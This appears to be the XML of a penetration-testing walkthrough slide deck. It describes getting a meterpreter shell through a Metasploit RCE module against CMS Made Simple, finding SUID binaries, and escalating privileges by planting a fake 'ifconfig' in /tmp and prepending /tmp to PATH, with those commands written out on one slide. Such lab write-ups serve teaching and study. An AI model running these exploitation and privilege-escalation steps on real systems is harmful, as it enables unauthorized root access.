        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1807642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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DE06295-7BA0-1912-6329-8853B09660A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747686" y="836414"/>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9998FF"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Exploit Execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B66534BF-C289-3E89-0CFC-E06E1E34DCA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747685" y="1489234"/>
            <a:ext cx="13008071" cy="1121444"/>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Metasploit was employed to execute the RCE exploit ("exploit/multi/http/cmsms_showtime2_rce"), resulting in a meterpreter shell on the target system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89B07B8B-816F-5ADA-679B-8EE7D4AC1036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325218" y="2526713"/>
            <a:ext cx="11383618" cy="5370733"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315488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599FAC9-E8C6-47EA-88C7-6A33F232A8E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="208795" y="3449321"/>
            <a:ext cx="10350501" cy="3992880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 2" descr="preencoded.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{914386E1-BC09-34F9-5AD0-895800DD5FA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9093200" y="1"/>
            <a:ext cx="5537200" cy="8229600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F0542D9-066C-0BFF-EF64-AC1C8B33AEB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1015627"/>
            <a:ext cx="7315200" cy="502702"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3150"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9998FF"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A45CE6F7-96B6-CF35-E516-5B4212A5C122}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749302" y="1595141"/>
            <a:ext cx="6743700" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use the run or exploit command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="313803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AAF66DF5-0F7E-CA08-F948-A8F904234D53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="775454" y="1022310"/>
            <a:ext cx="6136729" cy="406003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3150"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2550" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9998FF"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Shell Upgrade</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA523662-F636-29F1-041F-ABE5DC526320}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="775454" y="1675130"/>
            <a:ext cx="7365246" cy="1185148"/>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The meterpreter shell was upgraded to a fully interactive one using a Python one-liner.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen shot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6E8B715-C749-6B4D-DF2A-7F6284808B30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="417432" y="3878643"/>
            <a:ext cx="13454212" cy="1845642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264376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2464" y="520422"/>
            <a:ext cx="4980980" cy="622697"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="4900"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9998FF"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Installation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 0" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="662464" y="1639848"/>
            <a:ext cx="946309" cy="1514118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1892618" y="1829038"/>
            <a:ext cx="5191720" cy="908685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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The command "find / -perm -u=s -type f" was used to locate files with SUID permissions, revealing the "network_info" binary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 1" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="662464" y="3153966"/>
            <a:ext cx="946309" cy="2090499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1892618" y="3343156"/>
            <a:ext cx="2490430" cy="311348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1950" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>PATH Manipulation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1892618" y="3843695"/>
            <a:ext cx="5191720" cy="1211580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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A malicious "ifconfig" file was created in the /tmp directory. The PATH environment variable was modified to include /tmp, allowing execution of the "network_info" binary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 2" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="662464" y="5244465"/>
            <a:ext cx="946309" cy="1787604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1892618" y="5433655"/>
            <a:ext cx="2490430" cy="311348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1950" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1892618" y="5934194"/>
            <a:ext cx="5191720" cy="908685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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Executing "network_info" resulted in privilege escalation, granting access to the system as a privileged user.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 3" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7546062" y="831770"/>
            <a:ext cx="6421874" cy="64218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F6DD32D2-A3D6-2421-A6D2-32C962586079}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="563328" y="537281"/>
            <a:ext cx="1055013" cy="1908215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDB7BC99-2291-2975-F674-BC1B4E04B37D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1934809" y="748259"/>
            <a:ext cx="3064073" cy="347067"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SUID Binary Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68F44067-EAA6-85A7-EB20-C20AB697EBFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1934809" y="1221890"/>
            <a:ext cx="6295668" cy="1012627"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2650"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The command "find / -perm -u=s -type f" was used to locate files with SUID permissions, revealing the "network_info" binary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEA79D80-90A0-ADAE-FA5D-3743C6B40122}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2249521" y="2498725"/>
            <a:ext cx="10131358" cy="5509468"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1384731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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA8B2BB3-C228-07CD-9291-5D4042ABC24A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1019532" y="1068748"/>
            <a:ext cx="3951862" cy="347067"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>PATH Manipulation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3D3C690-C151-F4B6-5731-D9C2CC87A9BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1019532" y="1542379"/>
            <a:ext cx="8318644" cy="1012627"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2650"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A malicious "ifconfig" file was created in the /tmp directory. The PATH environment variable was modified to include /tmp, allowing execution of the "network_info" binary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B8EB05-94D4-05C2-8403-01C83765B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631" y="3839957"/>
            <a:ext cx="8545390" cy="3852288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BDAB406-B204-DE58-984F-162F9E664452}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9564921" y="1000654"/>
            <a:ext cx="7315200" cy="2839303"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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28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2800"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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"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network_info</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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8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cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"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tmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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8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echo "/bin/bash" &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"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ifconfig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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800"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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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777 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"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ifconfig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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8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export PATH=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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:$PATH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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2800"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whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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21703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060734"/>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9998FF"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Reconnaissance</a:t>
            </a:r>
